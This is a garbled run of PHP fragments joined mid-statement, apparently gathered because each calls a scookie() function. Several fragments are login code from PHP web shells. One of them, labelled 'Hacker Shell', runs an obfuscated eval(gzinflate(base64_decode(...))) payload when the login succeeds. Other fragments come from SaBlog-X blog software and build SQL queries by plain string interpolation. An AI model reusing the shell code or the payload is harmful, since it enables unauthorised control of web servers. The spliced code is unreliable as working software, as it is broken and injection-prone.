if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-1"); } if ($haz == "logout") { scookie('godssid', '', -86400 * 365); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } if ($admin['check']) { $password = md5($password); if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('godssid', $password); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } } if ($_COOKIE['godssid']) { if ($_COOKIE['godssid'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } $errmsg = ''; if ($haz == 'phpinfo') {
} elseif ($charset == 'eucjpms') { header("content-Type: text/html; charset=euc-jp"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== 身份验证 =====================*/ if ($action == "logout") { scookie('loginpass', '', -86400 * 365); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } if ($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == md5($password)) { scookie('loginpass', md5($password)); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } } if ($_COOKIE['loginpass']) { if ($_COOKIE['loginpass'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== 验证结束 =====================*/ $errmsg = '';
header("content-Type: text/html; charset=euc-kr"); } elseif ($charset == 'euc-jp') { header("content-Type: text/html; charset=euc-jp"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== 韬唤楠岃瘉 =====================*/ if ($action == "logout") { scookie('loginpass', '', -86400 * 365); @header('Location: ' . $self); exit; } if ($pass) { if ($action == 'login') { if ($pass == encode_pass($password)) { scookie('loginpass', encode_pass($password)); @header('Location: ' . $self); exit; } } if ($_COOKIE['loginpass']) { if ($_COOKIE['loginpass'] != $pass) { loginpage(); } } else { loginpage(); } } /*===================== 楠岃瘉缁撴潫 =====================*/ $errmsg = ''; !$action && ($action = 'file');
} elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== 身份验证 =====================*/ if ($action == "logout") { scookie('phpspypass', '', -86400 * 365); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } if ($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('phpspypass', $password); p('<meta http-equiv="refresh" content="1;URL=' . $self . '">'); p('<a style="font:12px Verdana" href="' . $self . '">Success</a>'); exit; } } if ($_COOKIE['phpspypass']) { if ($_COOKIE['phpspypass'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== 验证结束 =====================*/ $errmsg = '';
header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); if ($action == "logout") { scookie('kyobin', '', -86400 * 365); p('<meta http-equiv="refresh" content="0;URL=' . $self . '">'); p('<body background=black>'); exit; } if ($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('kyobin', $password); //Passwd Bypass Read eval(gzinflate(base64_decode('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'))); p('<meta http-equiv="refresh" content="2;URL=' . $self . '">'); p('<body bgcolor=black> <BR><BR><div align=center><font color=yellow face=tahoma size=2>Hacker Shell - Yukleniyor..<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>'); exit; } else { $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>'; echo $err_mess; } } if ($_COOKIE['kyobin']) { if ($_COOKIE['kyobin'] != $admin['pass']) { loginpage(); }
${'p' . $i} = isset($P['p' . $i]) ? $P['p' . $i] : ''; } if (isset($charsetdb[$charset])) { header("content-Type: text/html; charset=" . $charset); } $timestamp = time(); /* 身份验证 */ if ($act == "logout") { scookie('loginpass', '', -86400 * 365); @header('Location: ' . SELF); exit; } if ($pass) { if ($act == 'login') { if ($pass == encode_pass($P['password'])) { scookie('loginpass', encode_pass($P['password'])); @header('Location: ' . SELF); exit; } } if (isset($_COOKIE['loginpass'])) { if ($_COOKIE['loginpass'] != $pass) { loginpage(); } } else { loginpage(); } } /* 验证结束 */ $errmsg = ''; $uchar = '▲';
$article['allowread'] = 0; } else { $article['allowread'] = 1; if ($article['attachments']) { $haveattach = 1; } if ($article['description']) { $article['content'] = $article['description']; } } $articledb[$article['articleid']] = $article; } unset($article); $DB->free_result($query); //设置一个时间戳,一定时间内该时间戳有效.用于COOKIE防盗链 scookie('viewarticle', $timestamp); $metadb = array(); if ($aids) { $query = $DB->query("SELECT m.mid, m.name, m.slug, m.type, r.cid FROM {$db_prefix}metas m\r\n\t\t\tINNER JOIN {$db_prefix}relationships r ON r.mid = m.mid\r\n\t\t\tWHERE m.type IN ('category', 'tag') AND r.cid IN ({$aids})\r\n\t\t\tORDER BY m.displayorder ASC, m.mid DESC"); while ($meta = $DB->fetch_array($query)) { if ($meta['type'] == 'tag') { $meta['url'] = gettaglink($meta['slug']); $articledb[$meta['cid']]['content'] = highlight_tag($articledb[$meta['cid']]['content'], $meta['name']); } else { $meta['url'] = getcatelink($meta['mid'], $meta['slug']); } $metadb[$meta['cid']][$meta['type']][] = $meta; } unset($meta); $DB->free_result($query); if ($haveattach) {
} $username = char_cv($username); $r = $DB->fetch_one_array("SELECT userid FROM {$db_prefix}users WHERE username='******' LIMIT 1"); if ($r['userid']) { redirect('该用户名已被注册.'); } $email = char_cv($email); $r = $DB->fetch_one_array("SELECT userid FROM {$db_prefix}users WHERE email='{$email}' LIMIT 1"); if ($r['userid']) { redirect('该E-mail已被注册.'); } $password = md5($password); $DB->query("INSERT INTO {$db_prefix}users (username, password, logincount, loginip, logintime, email, url, regdateline, regip, groupid, lastip, lastvisit, lastactivity) VALUES ('{$username}', '{$password}', '1', '{$onlineip}', '{$timestamp}', '{$email}', '{$url}', '{$timestamp}', '{$onlineip}', '3', '{$onlineip}', '{$timestamp}', '{$timestamp}')"); $sax_uid = $DB->insert_id(); //保存COOKIE scookie('sax_auth', authcode("{$sax_uid}\t{$password}\t1"), $login_life); //更新数据库中的登陆会话 updatesession(); redirect('注册成功.', $options['url']); } //登陆状态检测 if (!$sax_uid || !$sax_pw || !$sax_logincount) { loginpage(); } else { $r = $DB->fetch_one_array("SELECT userid, password, logincount FROM {$db_prefix}users WHERE userid='{$sax_uid}'"); if (!$r) { loginpage(); } if ($sax_pw != $r['password']) { loginpage(); }
message('该评论已存在'); } $DB->query("INSERT INTO {$db_prefix}comments (comment_parent, articleid, author, email, url, dateline, content, ipaddress, visible) VALUES ('{$comment_parent}', '{$articleid}', '{$username}', '{$email}', '{$url}', '{$timestamp}', '{$content}', '{$onlineip}', '{$visible}')"); $cmid = $DB->insert_id(); if ($sax_uid) { $DB->unbuffered_query("UPDATE {$db_prefix}users SET lastpost='{$timestamp}' WHERE userid='{$sax_uid}'"); // 更新用户最后发表时间 } if (!$spam) { // 如果不是垃圾则更新当前文章评论数 $DB->unbuffered_query("UPDATE {$db_prefix}articles SET comments=comments+1 WHERE articleid='{$articleid}'"); $DB->unbuffered_query("UPDATE {$db_prefix}statistics SET comment_count=comment_count+1"); newcomments_recache(); statistics_recache(); } scookie('comment_post_time', $timestamp); // 跳转到最新发表的评论 if ($comment_parent) { $gocommentid = get_comment_parent($comment_parent); } else { $gocommentid = $cmid; } $cmnum = '#cm' . $gocommentid; $article_comment_num = (int) $options['article_comment_num']; if ($article_comment_num) { $cpost = $DB->result($DB->query("SELECT COUNT(commentid) FROM {$db_prefix}comments WHERE articleid='{$articleid}' AND visible='1' AND commentid<='{$gocommentid}' AND comment_parent='0'"), 0); if ($cpost / $article_comment_num <= 1) { $page = 1; } else { $page = @ceil($cpost / $article_comment_num); $article['url'] = redirect_permalink($articleid, $article['alias'], $page);
function dcookies($key = '') { global $sax_uid, $sax_user, $sax_pw; if ($key) { if (is_array($_COOKIE[$key])) { foreach ($_COOKIE[$key] as $k => $name) { scookie($key . '[' . $k . ']', '', -86400 * 365); } } else { scookie($key, '', -86400 * 365); } } else { if (is_array($_COOKIE)) { foreach ($_COOKIE as $key => $val) { scookie($key, '', -86400 * 365); } } $sax_uid = 0; $sax_user = $sax_pw = ''; } }
"> <title>Refresh Limitation Enabled</title> </head> <body style="table-layout:fixed; word-break:break-all"> <center> <div style="margin-top:100px;background-color:#f1f1f1;text-align:center;width:600px;padding:20px;margin-right: auto;margin-left: auto;font-family: Verdana, Tahoma; color: #666666; font-size: 12px"> <p><strong>Refresh Limitation Enabled</strong></p> <p>The time between your two requests is smaller than 2 seconds, please do NOT refresh and wait for automatical forwarding ...</p> </div> </center> </body> </html> <?php exit; } scookie('lastrequest', $timestamp . "\t" . $REQUEST_URI); } if (($attackevasive == 2 || $attackevasive == 3) && ($_SERVER['HTTP_X_FORWARDED_FOR'] || $_SERVER['HTTP_VIA'] || $_SERVER['HTTP_PROXY_CONNECTION'] || $_SERVER['HTTP_USER_AGENT_VIA'])) { ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Proxy Connection Denied</title> </head> <body style="table-layout:fixed; word-break:break-all"> <center> <div style="margin-top:100px;background-color:#f1f1f1;text-align:center;width:600px;padding:20px;margin-right: auto;margin-left: auto;font-family: Verdana, Tahoma; color: #666666; font-size: 12px"> <p><strong>Proxy Connection Denied</strong></p> <p>Your request was forbidden due to the administrator has set to deny all proxy connection.</p> </div> </center>
$query = $DB->query("SELECT m.mid, m.name, m.slug, m.type, r.cid FROM {$db_prefix}metas m\r\n\tINNER JOIN {$db_prefix}relationships r ON r.mid = m.mid\r\n\tWHERE m.type IN ('category', 'tag') AND r.cid='" . $article['articleid'] . "'\r\n\tORDER BY m.displayorder ASC, m.mid DESC"); $article['keywords'] = $comma = ''; while ($meta = $DB->fetch_array($query)) { if ($meta['type'] == 'tag') { $meta['url'] = gettaglink($meta['slug']); $article['content'] = highlight_tag($article['content'], $meta['name']); } else { $meta['url'] = getcatelink($meta['mid'], $meta['slug']); } $article['keywords'] .= $comma . $meta['name']; $metadb[$article['articleid']][$meta['type']][] = $meta; $comma = ','; } $DB->free_result($query); if ($_POST['readpassword'] && $article['readpassword'] == sax_addslashes($_POST['readpassword'])) { scookie('readpassword_' . $article['articleid'], sax_addslashes($_POST['readpassword']), 2592000); //一个月 } //设置文章的分类名、作者、TAG、标题成为meta\title信息 if (!$article['keywords']) { $tmp = $comma = ''; if (is_array($catecache) && count($catecache)) { foreach ($catecache as $data) { $tmp .= $comma . $data['name']; $comma = ','; } $options['meta_keywords'] = $tmp; } else { $options['meta_keywords'] = ''; } } else {
// 本文件说明:前台主程序 // --------------------------------------------------------------// // 本程序作者:angel // --------------------------------------------------------------// // 本程序版本:SaBlog-X Ver 2.0 // --------------------------------------------------------------// // 本程序主页:http://www.sablog.net // ==============================================================// require_once 'global.php'; //require_once(SABLOG_ROOT.'include/query.inc.php'); !$action && ($action = 'article'); //清除浏览文章记录 if ($_GET['action'] == 'clearalready') { if (is_array($_COOKIE['articleids'])) { foreach ($_COOKIE['articleids'] as $key => $value) { scookie("articleids[" . $key . "]", ''); } } message('已经删除浏览过的文章记录', $referer); } $page = $maxpages && $page > $maxpages ? 1 : $page; $moduledb = array('article', 'show', 'tagslist', 'archives', 'links'); if (in_array($action, $moduledb)) { $archivenum = count($archivecache); //前台显示12个归档就可以了.显示那么多干嘛? if ($archivenum > 12) { $archivecache = array_slice($archivecache, 0, 12); } $module = loadmodule($action); } else { message('未知模块');